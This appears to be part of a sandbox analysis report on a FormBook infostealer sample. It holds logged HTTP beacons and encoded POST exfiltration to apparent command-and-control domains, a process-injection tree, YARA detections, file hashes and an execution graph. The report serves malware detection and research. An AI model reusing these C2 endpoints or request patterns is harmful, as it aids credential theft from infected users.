                          Origin: http://www.komart.shop
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Content-Length: 222
                          Referer: http://www.komart.shop/p9u3/
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Data Raw: 33 6a 45 38 6f 3d 4f 33 68 38 38 30 4a 61 6f 65 74 31 46 2b 42 4a 51 42 74 70 34 6e 56 76 42 44 49 72 7a 37 4f 38 38 4d 42 38 47 64 36 59 68 6b 4c 6f 41 52 69 4a 50 36 49 6a 33 36 52 6d 74 6c 33 57 54 36 71 41 51 42 77 75 57 58 6d 6c 6b 70 6c 31 55 79 38 6c 63 5a 74 4e 2b 4f 77 67 6c 42 6a 54 4f 52 6e 50 38 42 71 2b 51 6d 36 4c 42 35 53 73 45 6c 36 67 65 33 55 6f 72 36 33 58 51 76 53 54 51 57 74 59 30 35 72 58 52 49 68 72 41 2b 6f 78 35 48 35 70 4e 67 70 44 34 77 65 66 63 68 76 4f 6b 6a 2f 4e 39 7a 4e 4e 62 66 48 75 33 4c 4a 6d 55 36 6e 6f 36 62 2b 48 45 39 33 35 47 44 75 72 4e 72 71 65 4c 6a 6f 2f 62 48 61 74 41 6f 41 5a 45 4e 79 4c 47 32 39 37 76 72 34 3d
                          Data Ascii: 3jE8o=O3h880Jaoet1F+BJQBtp4nVvBDIrz7O88MB8Gd6YhkLoARiJP6Ij36Rmtl3WT6qAQBwuWXmlkpl1Uy8lcZtN+OwglBjTORnP8Bq+Qm6LB5SsEl6ge3Uor63XQvSTQWtY05rXRIhrA+ox5H5pNgpD4wefchvOkj/N9zNNbfHu3LJmU6no6b+HE935GDurNrqeLjo/bHatAoAZENyLG297vr4=
                          Sep 23, 2024 14:56:22.341589928 CEST668INHTTP/1.1 404 Not Found
                          content-encoding: gzip
                          content-type: text/html
                          date: Mon, 23 Sep 2024 12:56:22 GMT
                          etag: W/"66d6a4ca-2b5"
                          server: nginx
                          vary: Accept-Encoding
                          content-length: 454
                          connection: close
                          Data Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb [TRUNCATED]
                          Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          35192.168.2.449773133.130.35.90802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:56:24.179765940 CEST10819OUTPOST /p9u3/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Accept-Encoding: gzip, deflate
                          Host: www.komart.shop
                          Origin: http://www.komart.shop
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Content-Length: 10302
                          Referer: http://www.komart.shop/p9u3/
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Data Raw: 33 6a 45 38 6f 3d 4f 33 68 38 38 30 4a 61 6f 65 74 31 46 2b 42 4a 51 42 74 70 34 6e 56 76 42 44 49 72 7a 37 4f 38 38 4d 42 38 47 64 36 59 68 6b 44 6f 41 67 43 4a 4d 5a 51 6a 32 36 52 6d 79 56 33 58 54 36 72 43 51 46 63 71 57 58 71 31 6b 72 64 31 53 51 30 6c 49 34 74 4e 77 4f 77 67 39 42 6a 53 41 78 6d 53 38 46 4f 79 51 69 6d 4c 42 35 53 73 45 6d 69 67 65 6c 38 6f 70 36 33 55 5a 50 53 50 55 57 74 77 30 35 79 73 52 49 31 52 41 50 49 78 35 6e 70 70 50 56 31 44 6c 41 65 52 64 68 76 57 6b 6a 69 54 39 7a 52 72 62 66 69 37 33 4a 56 6d 58 4e 57 4e 76 50 4f 48 65 4d 4c 32 55 6b 43 6f 4b 70 2b 75 44 77 55 42 62 6b 61 71 54 4a 51 73 44 74 58 75 57 55 68 34 37 76 6b 2f 35 75 75 63 62 55 54 54 64 38 59 4b 57 4f 56 56 73 2f 4c 56 55 66 62 71 42 71 46 79 42 6b 2f 58 7a 6f 37 6e 4f 37 2b 44 6e 48 6f 69 36 75 55 76 35 2b 2f 2b 39 43 79 49 4a 67 65 33 31 52 71 46 79 4a 77 37 66 77 6d 67 36 4e 49 5a 74 74 72 32 66 37 50 70 46 76 54 68 4d 56 4c 6f 61 77 52 79 62 75 73 6c 75 66 43 43 68 5a 6f 47 65 30 2b 2b 63 41 63 72 [TRUNCATED]
                          Data Ascii: 3jE8o=O3h880Jaoet1F+BJQBtp4nVvBDIrz7O88MB8Gd6YhkDoAgCJMZQj26RmyV3XT6rCQFcqWXq1krd1SQ0lI4tNwOwg9BjSAxmS8FOyQimLB5SsEmigel8op63UZPSPUWtw05ysRI1RAPIx5nppPV1DlAeRdhvWkjiT9zRrbfi73JVmXNWNvPOHeML2UkCoKp+uDwUBbkaqTJQsDtXuWUh47vk/5uucbUTTd8YKWOVVs/LVUfbqBqFyBk/Xzo7nO7+DnHoi6uUv5+/+9CyIJge31RqFyJw7fwmg6NIZttr2f7PpFvThMVLoawRybuslufCChZoGe0++cAcrsXtuRnpY76CD6a+nwIUcoT+szmj1TZAERMBsMbHx2/3oCe1hRX+1O1L5hnpX0/nw71sKHPeVBCDLkOlTdiP/t9Umfp5ZlKqv+JLP1eFa862B720Ns5XcK81Bhd0LQdRZFNCXFth3fnnx8QSOzxU0l8wbOMtk9FV1Icc7Ds6YeJdfdMWT2fSgUTzQ+sr0PPRXbWTzwB7dxSxnRFqhTLuMxYJDaIp7MZefRUmNbjCJU/DrmGXT//LlYxgP39pk4HeaWOS/ezCeO4AySCslv8VDpXMczGtne0EunvoGxwp+szy52EESFy5Dk2tsF6yUNeooDtSfsGP5+bae14py8AQ2sUJp2Qoh7QYg615UrCo2UpAcRnh+D3Dv0oIkZkxgcuNdvimCcoaLFLSJCv4qfD+aukaZqXF4Xp6iBC5/rEs5FveGnYgqSiEeZ5Z04W/RTmKxD3qFn+wBe77DsDt5+ROr4pbFzy4VNcX5l3aWLKg/nFBnbVetMb6/MQDBcE4rDnUbhZ93Yg+oWtGCcRmgarUIhFAFzQSaLNRGOaFDK5CBw1WELsuB0gh8sdTV441q4Dc76VsYIbjPQ4ZfU6+cdZA/jZq7+E2XqxR2uE4gyYDryjcf4OPpsQ6Ad79mJjKJhqK5d1anDHXiBx5So5xi8Rg31Z6gAzyJJmZTle [TRUNCATED]
                          Sep 23, 2024 14:56:24.915493965 CEST668INHTTP/1.1 404 Not Found
                          content-encoding: gzip
                          content-type: text/html
                          date: Mon, 23 Sep 2024 12:56:24 GMT
                          etag: W/"66d6a4ca-2b5"
                          server: nginx
                          vary: Accept-Encoding
                          content-length: 454
                          connection: close
                          Data Raw: 1f 8b 08 00 00 00 00 00 04 03 75 92 bd 6e 14 31 10 c7 fb 7b 0a e3 2a 91 b2 e7 43 29 63 6f 03 d4 49 71 0d d5 c9 f1 4e 6e 1d bc de c5 9e bb 70 42 3c cc 29 bb 4f 40 91 e3 43 91 20 a2 40 48 50 82 28 a0 42 3c 00 05 2d f6 7a 57 80 10 6e ec d9 f9 cf 6f be 96 df ba 7b 7c 67 7e ff e4 1e 29 b1 32 f9 84 c7 8b 18 69 97 82 9e 4b 1a 3f 80 2c f2 09 21 1c 35 1a c8 db a7 ed fb ee f3 f6 65 b7 6b 3f bc de 3d ff da 5e b5 5f da 17 ed 0f ce 92 3f 2a 2b 40 19 78 d8 64 f0 70 a5 d7 82 aa da 22 58 cc 70 d3 00 25 83 25 28 c2 23 64 31 e1 11 51 a5 74 1e 50 c0 4a 65 e7 0d 25 ac 4f d9 83 ac ac 40 d0 b5 86 8b a6 76 f8 47 f8 85 2e b0 14 05 ac b5 82 ac 37 0e 88 b6 1a b5 34 99 57 d2 80 b8 3d 9d 85 16 42 45 46 db 07 c4 81 11 d4 e3 c6 80 2f 01 02 a9 74 70 26 28 53 de 33 70 ae 76 d3 f0 8a 2d b3 d4 33 3f ad 8b 4d 30 0b bd 26 ca 48 ef 05 0d 1d 45 61 82 ea 6a 49 bc 53 81 10 5e 89 30 70 1a bb a4 44 1a 14 34 94 fb 57 e4 62 a1 2b b9 84 04 f8 17 bc 58 54 e0 fd 28 08 85 37 b1 fc 78 fe 37 f7 ed 25 3f 75 a3 e8 70 f6 f6 66 f7 ad 7d d7 5d 75 df bb [TRUNCATED]
                          Data Ascii: un1{*C)coIqNnpB<)O@C @HP(B<-zWno{|g~)2iK?,!5ek?=^_?*+@xdp"Xp%%(#d1QtPJe%O@vG.74W=BEF/tp&(S3pv-3?M0&HEajIS^0pD4Wb+XT(7x7%?upf}]uOo_l{84OR(g2BqB"n+WG}z@g*{bLdtLQ$$|k


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          36192.168.2.449774133.130.35.90802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:56:26.730726957 CEST455OUTGET /p9u3/?3jE8o=D1Jc/C1nh+BZL85ZeChw3l4+cioj8fKXqdphFMmfowbAWgC+evwb7cYTziaUWePLaVULTAuSiJlrRgQRJK1Ewp0jkjvaZxrb1x+aTR+tBdOAHUHhfEgGmf4=&oB=mVppHlHxM HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Host: www.komart.shop
                          Connection: close
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Sep 23, 2024 14:56:27.499661922 CEST883INHTTP/1.1 404 Not Found
                          content-type: text/html
                          date: Mon, 23 Sep 2024 12:56:27 GMT
                          etag: W/"66d6a4ca-2b5"
                          server: nginx
                          vary: Accept-Encoding
                          content-length: 693
                          connection: close
                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 6a 61 22 3e 0a 3c 68 65 61 64 3e 0a 20 20 3c 74 69 74 6c 65 3e a4 b3 a4 ce a5 da a1 bc a5 b8 a4 cf c2 b8 ba df a4 b7 a4 de a4 bb a4 f3 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 63 6f 6e 74 65 6e 74 2d 74 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 65 75 63 2d 6a 70 22 20 2f 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 65 72 72 6f 72 2e 63 73 73 22 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 64 69 76 20 63 6c 61 73 73 3d 22 70 2d 65 72 72 6f 72 22 3e 0a 20 20 3c 69 6d 67 20 73 72 63 3d 22 2f 69 6d 67 2f 65 72 72 6f 72 2f 65 72 [TRUNCATED]
                          Data Ascii: <!DOCTYPE html><html lang="ja"><head> <title></title> <meta http-equiv="content-type" content="text/html; charset=euc-jp" /> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <link rel="stylesheet" href="/css/error.css"></head><body><div class="p-error"> <img src="/img/error/error.png" alt="" class="p-error__image"> <div class="p-error__message"> <p> <br> 30 </p> <p> <a href="/">TOP</a> </p> </div></div><script> setTimeout("redirect()", 30000); function redirect(){ location.href="/"; }</script></body></html>


                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                          37192.168.2.4497753.33.130.190802412C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:56:32.788366079 CEST747OUTPOST /u6k6/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Accept-Encoding: gzip, deflate
                          Host: www.healthyloveforall.net
                          Origin: http://www.healthyloveforall.net
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Content-Length: 202
                          Referer: http://www.healthyloveforall.net/u6k6/
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Data Raw: 33 6a 45 38 6f 3d 51 61 52 72 63 32 31 4c 36 2f 41 4d 63 70 41 36 63 50 56 4a 45 6c 65 50 69 6f 6a 76 35 2f 48 65 52 34 52 6b 37 66 36 34 68 43 56 51 4f 49 76 76 35 57 71 4e 6b 32 4a 2b 57 51 51 52 2f 42 79 2b 6b 36 61 2f 33 35 34 52 44 67 58 45 32 52 6f 31 30 50 4c 35 59 41 64 33 36 34 67 58 50 72 53 2f 51 71 2f 44 35 30 30 54 57 2b 4e 31 51 79 76 36 37 70 44 73 48 2b 6e 6b 7a 77 38 5a 34 58 54 68 69 31 54 36 33 72 39 36 55 4e 4b 52 70 70 46 69 49 45 67 6e 61 62 2b 71 4a 75 38 4d 68 41 50 46 71 4e 71 4e 44 59 46 68 70 6e 79 6c 55 65 38 4b 35 70 38 2b 63 6c 65 64 77 36 36 50 7a 69 4d 44 36 41 3d 3d
                          Data Ascii: 3jE8o=QaRrc21L6/AMcpA6cPVJElePiojv5/HeR4Rk7f64hCVQOIvv5WqNk2J+WQQR/By+k6a/354RDgXE2Ro10PL5YAd364gXPrS/Qq/D500TW+N1Qyv67pDsH+nkzw8Z4XThi1T63r96UNKRppFiIEgnab+qJu8MhAPFqNqNDYFhpnylUe8K5p8+cledw66PziMD6A==


                          Session IDSource IPSource PortDestination IPDestination Port
                          38192.168.2.4497763.33.130.19080
                          TimestampBytes transferredDirectionData
                          Sep 23, 2024 14:56:35.767796993 CEST767OUTPOST /u6k6/ HTTP/1.1
                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                          Accept-Language: en-US
                          Accept-Encoding: gzip, deflate
                          Host: www.healthyloveforall.net
                          Origin: http://www.healthyloveforall.net
                          Connection: close
                          Cache-Control: max-age=0
                          Content-Type: application/x-www-form-urlencoded
                          Content-Length: 222
                          Referer: http://www.healthyloveforall.net/u6k6/
                          User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko)
                          Data Raw: 33 6a 45 38 6f 3d 51 61 52 72 63 32 31 4c 36 2f 41 4d 65 4a 77 36 61 65 56 4a 46 46 65 4f 6e 6f 6a 76 77 66 48 53 52 34 56 6b 37 61 44 39 69 77 68 51 4f 71 48 76 34 53 2b 4e 6c 32 4a 2b 4f 41 51 55 78 68 79 35 6b 36 57 47 33 34 6f 52 44 67 44 45 32 55 55 31 30 38 6a 36 65 51 64 31 31 59 67 56 53 62 53 2f 51 71 2f 44 35 30 77 35 57 2b 56 31 54 43 66 36 38 39 58 74 59 4f 6e 6e 30 77 38 5a 7a 33 54 6c 69 31 54 63 33 71 67 56 55 49 4f 52 70 74 42 69 49 51 38 6b 54 62 2b 73 46 2b 39 5a 67 44 72 4b 72 6f 6e 37 44 4c 67 47 30 32 61 43 52 59 74 51 6f 59 64 70 4f 6c 36 75 74 39 7a 37 2b 68 78 4b 68 48 58 72 35 41 4e 73 32 71 42 4a 67 6b 6a 4d 6e 65 61 4c 47 5a 30 3d
                          Data Ascii: 3jE8o=QaRrc21L6/AMeJw6aeVJFFeOnojvwfHSR4Vk7aD9iwhQOqHv4S+Nl2J+OAQUxhy5k6WG34oRDgDE2UU108j6eQd11YgVSbS/Qq/D50w5W+V1TCf689XtYOnn0w8Zz3Tli1Tc3qgVUIORptBiIQ8kTb+sF+9ZgDrKron7DLgG02aCRYtQoYdpOl6ut9z7+hxKhHXr5ANs2qBJgkjMneaLGZ0=


                          Click to jump to process

                          Click to jump to process

                          Click to dive into process behavior distribution

                          Click to jump to process

                          Target ID:0
                          Start time:08:53:26
                          Start date:23/09/2024
                          Path:C:\Users\user\Desktop\Enquiry.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\Enquiry.exe"
                          Imagebase:0x400000
                          File size:1'350'779 bytes
                          MD5 hash:C317103EC0A74F2C480A9F859102B530
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Reputation:low
                          Has exited:true

                          Target ID:1
                          Start time:08:53:30
                          Start date:23/09/2024
                          Path:C:\Windows\SysWOW64\svchost.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Users\user\Desktop\Enquiry.exe"
                          Imagebase:0xb50000
                          File size:46'504 bytes
                          MD5 hash:1ED18311E3DA35942DB37D15FA40CC5B
                          Has elevated privileges:true
                          Has administrator privileges:true
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1991008499.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1991008499.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.2000492218.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.2000492218.0000000003350000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000001.00000002.1997146655.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000001.00000002.1997146655.0000000000B00000.00000040.10000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:high
                          Has exited:true

                          Target ID:3
                          Start time:08:53:44
                          Start date:23/09/2024
                          Path:C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe"
                          Imagebase:0x240000
                          File size:140'800 bytes
                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000003.00000002.3534236092.0000000002FE0000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000003.00000002.3534236092.0000000002FE0000.00000040.00000001.00040000.00000000.sdmp, Author: unknown
                          Reputation:high
                          Has exited:false

                          Target ID:6
                          Start time:08:53:51
                          Start date:23/09/2024
                          Path:C:\Windows\SysWOW64\RmClient.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Windows\SysWOW64\RmClient.exe"
                          Imagebase:0x4c0000
                          File size:15'360 bytes
                          MD5 hash:CE765DCC7CDFDC1BFD94CCB772C75E41
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3532848428.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3532848428.0000000002F30000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3534273215.0000000003660000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3534273215.0000000003660000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000006.00000002.3533106895.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000006.00000002.3533106895.00000000033D0000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                          Reputation:moderate
                          Has exited:false

                          Target ID:7
                          Start time:08:54:05
                          Start date:23/09/2024
                          Path:C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files (x86)\kYlwhkSNPmMYdzuBsxsIlooMvQFzcJWcADMKIoPVYfVYIDUXcpuqakkuNdXpy\lOHjHqJCgqObv.exe"
                          Imagebase:0x240000
                          File size:140'800 bytes
                          MD5 hash:32B8AD6ECA9094891E792631BAEA9717
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Yara matches:
                          • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000007.00000002.3536218795.0000000005770000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                          • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000007.00000002.3536218795.0000000005770000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
                          Reputation:high
                          Has exited:false

                          Target ID:8
                          Start time:08:54:18
                          Start date:23/09/2024
                          Path:C:\Program Files\Mozilla Firefox\firefox.exe
                          Wow64 process (32bit):true
                          Commandline:"C:\Program Files\Mozilla Firefox\Firefox.exe"
                          Imagebase:0x240000
                          File size:676'768 bytes
                          MD5 hash:C86B1BE9ED6496FE0E0CBE73F81D8045
                          Has elevated privileges:false
                          Has administrator privileges:false
                          Programmed in:C, C++ or other language
                          Reputation:high
                          Has exited:true

                          Reset < >

                            Execution Graph

                            Execution Coverage:3.6%
                            Dynamic/Decrypted Code Coverage:0.4%
                            Signature Coverage:7.9%
                            Total number of Nodes:2000
                            Total number of Limit Nodes:57
                            execution_graph 84111 4010e0 84114 401100 84111->84114 84113 4010f8 84115 401113 84114->84115 84116 401120 84115->84116 84117 401184 84115->84117 84118 40114c 84115->84118 84149 401182 84115->84149 84119 40112c DefWindowProcW 84116->84119 84173 401000 Shell_NotifyIconW __recalloc 84116->84173 84152 401250 84117->84152 84120 401151 84118->84120 84121 40119d 84118->84121 84119->84113 84123 401219 84120->84123 84124 40115d 84120->84124 84126 4011a3 84121->84126 84127 42afb4 84121->84127 84123->84116 84130 401225 84123->84130 84128 401163 84124->84128 84129 42b01d 84124->84129 84125 401193 84125->84113 84126->84116 84133 4011b6 KillTimer 84126->84133 84134 4011db SetTimer RegisterWindowMessageW 84126->84134 84168 40f190 10 API calls 84127->84168 84135 42afe9 84128->84135 84136 40116c 84128->84136 84129->84119 84172 4370f4 52 API calls 84129->84172 84175 468b0e 74 API calls __recalloc 84130->84175 84167 401000 Shell_NotifyIconW __recalloc 84133->84167 84134->84125 84140 401204 CreatePopupMenu 84134->84140 84170 40f190 10 API calls 84135->84170 84136->84116 84142 401174 84136->84142 84137 42b04f 84174 40e0c0 74 API calls __recalloc 84137->84174 84140->84113 84169 45fd57 65 API calls __recalloc 84142->84169 84145 42b00e 84171 401a50 337 API calls 84145->84171 84146 4011c9 PostQuitMessage 84146->84113 84149->84119 84150 42afdc 84150->84119 84151 42afe4 84150->84151 84151->84125 84153 4012e8 84152->84153 84154 401262 __recalloc 84152->84154 84153->84125 84176 401b80 84154->84176 84156 40128c 84157 4012d1 KillTimer SetTimer 84156->84157 84158 4012bb 84156->84158 84159 4272ec 84156->84159 84157->84153 84162 4012c5 84158->84162 84163 42733f 84158->84163 84160 4272f4 Shell_NotifyIconW 84159->84160 84161 42731a Shell_NotifyIconW 84159->84161 84160->84157 84161->84157 84162->84157 84166 427393 Shell_NotifyIconW 84162->84166 84164 427348 Shell_NotifyIconW 84163->84164 84165 42736e Shell_NotifyIconW 84163->84165 84164->84157 84165->84157 84166->84157 84167->84146 84168->84125 84169->84150 84170->84145 84171->84149 84172->84149 84173->84137 84174->84149 84175->84151 84177 401b9c 84176->84177 84197 401c7e 84176->84197 84198 4013c0 52 API calls 84177->84198 84179 401bac 84180 42722b LoadStringW 84179->84180 84181 401bb9 84179->84181 84183 427246 84180->84183 84199 402160 84181->84199 84213 40e0a0 52 API calls 84183->84213 84184 401bcd 84186 427258 84184->84186 84187 401bda 84184->84187 84214 40d200 52 API calls 2 library calls 84186->84214 84187->84183 84188 401be4 84187->84188 84212 40d200 52 API calls 2 library calls 84188->84212 84191 427267 84192 42727b 84191->84192 84194 401bf3 _wcscpy __recalloc _wcsncpy 84191->84194 84215 40d200 52 API calls 2 library calls 84192->84215 84196 401c62 Shell_NotifyIconW 84194->84196 84195 427289 84196->84197 84197->84156 84198->84179 84200 426daa 84199->84200 84201 40216b _wcslen 84199->84201 84229 40c600 84200->84229 84204 402180 84201->84204 84205 40219e 84201->84205 84203 426db5 84203->84184 84216 403bd0 52 API calls moneypunct 84204->84216 84217 4013a0 52 API calls 84205->84217 84208 4021a5 84210 426db7 84208->84210 84218 4115d7 84208->84218 84209 402187 _memmove 84209->84184 84212->84194 84213->84194 84214->84191 84215->84195 84216->84209 84217->84208 84220 4115e1 _malloc 84218->84220 84221 4115fb 84220->84221 84222 4115fd std::exception::exception 84220->84222 84234 4135bb 84220->84234 84221->84209 84223 41163b 84222->84223 84248 41130a 51 API calls __cinit 84222->84248 84249 4180af 46 API calls std::exception::operator= 84223->84249 84225 411645 84250 418105 RaiseException 84225->84250 84228 411656 84230 40c619 84229->84230 84231 40c60a 84229->84231 84230->84203 84231->84230 84257 4026f0 84231->84257 84233 426d7a _memmove 84233->84203 84235 413638 _malloc 84234->84235 84242 4135c9 _malloc 84234->84242 84256 417f77 46 API calls __getptd_noexit 84235->84256 84238 4135f7 RtlAllocateHeap 84239 413630 84238->84239 84238->84242 84239->84220 84241 413624 84254 417f77 46 API calls __getptd_noexit 84241->84254 84242->84238 84242->84241 84243 4135d4 84242->84243 84246 413622 84242->84246 84243->84242 84251 418901 46 API calls __NMSG_WRITE 84243->84251 84252 418752 46 API calls 8 library calls 84243->84252 84253 411682 GetModuleHandleW GetProcAddress ExitProcess ___crtCorExitProcess 84243->84253 84255 417f77 46 API calls __getptd_noexit 84246->84255 84248->84223 84249->84225 84250->84228 84251->84243 84252->84243 84254->84246 84255->84239 84256->84239 84258 426873 84257->84258 84259 4026ff 84257->84259 84264 4013a0 52 API calls 84258->84264 84259->84233 84261 42687b 84262 4115d7 52 API calls 84261->84262 84263 42689e _memmove 84262->84263 84263->84233 84264->84261 84265 40bd20 84266 428194 84265->84266 84267 40bd2d 84265->84267 84269 40bd43 84266->84269 84271 4281bc 84266->84271 84272 4281b2 